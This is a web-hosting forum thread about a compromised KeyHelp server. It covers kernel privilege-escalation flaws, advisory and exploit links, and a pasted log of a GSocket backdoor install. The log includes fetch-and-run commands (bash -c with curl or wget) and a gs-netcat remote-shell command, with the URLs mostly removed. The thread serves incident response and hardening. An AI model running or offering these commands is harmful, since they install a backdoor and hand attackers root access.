Possible attack on Keyhelp panels
Re: Possible attack on Keyhelp panels
Re: Possible attack on Keyhelp panels
The logs you shared show that a Global Socket (GSocket) backdoor has been installed on your server. Even if you believe there was no "SSH access," this tool provides the attacker with a permanent, interactive reverse shell that is even more dangerous than a standard SSH breach.
Re: Possible attack on Keyhelp panels
I said it is simple, not harmless.
--
Backup: The duplicate copy of crucial data that no one bothered to make;
used only in the abstract
Re: Possible attack on Keyhelp panels
Yes, they are all LPEs if user with shell access is compromised:theqkash wrote: ↑Thu 14. May 2026, 19:24 It didn't have blank password. It's an attack, one of several ones, published last days. It allows any user in system to escalate privileges to root account, and then things like this are in logs. It is not a normal situation, but related to some actual security issue in kernel.
https://copy.fail/
https://ubuntu.com/blog/dirty-frag-linu ... -available
https://tuxcare.com/blog/fragnesia-cve- ... ernel-lpe/
Re: Possible attack on Keyhelp panels
Re: Possible attack on Keyhelp panels
My users also didn’t had any ssh, but because user within php was able to run some software on functions like provided above, they was able to get out of their user context and work as root.
Re: Possible attack on Keyhelp panels
The issue is, you don't need to give user SSH access. User needs just shell_exec or stuff and this is it.
Weird times...
Re: Possible attack on Keyhelp panels
Yes, that's why I wrote "shell" and not "SSH"...
Look at this beauty - weird times indeed: https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn
Re: Possible attack on Keyhelp panels
Re: Possible attack on Keyhelp panels
So are you saying a client website was hacked and because the server was not patched with the recent rights escalation vulnerabilities it escalated to the server?
Or are you saying they hacked the panel directly similar to Wordpress?
Because these are 2 things.
Wordpress hacks I know and had occationally and cleaned them up.
I also saw that isolation of accounts is great.
Re: Possible attack on Keyhelp panels
Gaining unrestricted access to the entire environment
-> WARNING: Using existing secret from '/home/users/dominio-com//.config/htop/defunct.dat'
--> Trying x86_64-alpine
Downloading binaries........................................................ [OK]
Unpacking binaries.......................................................... [OK]
Copying binaries............................................................ [OK]
Testing binaries............................................................ [OK]
Testing Global Socket Relay Network.....................................[FAILED]
--> Secret ‘fcc’ is already used.
--> To uninstall, use GS_UNDO=1 bash -c “$(curl -fsSL https:)”
--> To connect, use one of the following:
--> gs-netcat -s “abc” -i
--> S="tzh" bash -c “$(curl -fsSL https:)”
--> S="abg" bash -c “$(wget -qO- https:)”
We were very lucky that Zabbix detected the problem and the tampering, issuing an alert, and the attacker only had time to install the shell
GS_UNDO=1 bash -c “$(curl -fsSL https://)”
and we were able to trace where it went and which files it included as root
s2
Re: Possible attack on Keyhelp panels
You are hotlinking the virus.
How did you use Zabbix? Is it installed on each server, or is it a cloudinstance that used the other servers?
How did you mitigate the problem on the server? Delete the shell or were there new users?
Re: Possible attack on Keyhelp panels
Re: Possible attack on Keyhelp panels
1. Do not use outdated software
2. Allow only the PHP functions you need
3. Ensure hardest isolation of user accounts using KeyHelp Pro and SSH Chail
Tobi
-----------------------------
wewoco.de
Das Forum für Reseller, Digital-Agenturen, Bildschirmarbeiter und Mäuseschubser
Re: Possible attack on Keyhelp panels
Please do not post links to malware!
Always anonymize such content!
Thanks for your cooperation!
Tobi
-----------------------------
wewoco.de
Das Forum für Reseller, Digital-Agenturen, Bildschirmarbeiter und Mäuseschubser